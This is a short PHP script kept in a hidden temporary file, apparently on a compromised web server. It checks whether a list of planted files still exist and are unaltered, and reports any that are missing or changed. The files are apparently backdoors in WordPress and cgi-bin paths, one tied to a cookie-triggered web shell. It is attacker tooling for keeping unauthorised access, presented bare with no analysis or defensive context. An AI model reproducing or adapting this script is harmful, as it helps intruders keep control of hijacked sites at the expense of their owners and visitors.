Current File : //tmp/.parle_tokens
<?php   $r = '/home/mak/_wildcard_.mak.pt'; $x = ["/ratcdqjc.php"=>"bd@@111923@@$_COOKIE[-",
"/rgnqcypf.php"=>"bd@@115290@@97",
"/wp-content/string.php"=>"bd@@115330@@60",
"/wp-content/string.php"=>"bd@@114324@@1069",
"/wp.php"=>"bd@@112023@@1037",
"/wp-content/fsfilter.php"=>"bd@@115361@@1023",
"/O.php"=>"bd@@115370@@1028",
"/cgi-bin_bkp.php"=>"bd@@100805@@7818",
"/wp-content/edit.php"=>"bd@@114269@@14",
"/wp.php"=>"bd@@114117@@69"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');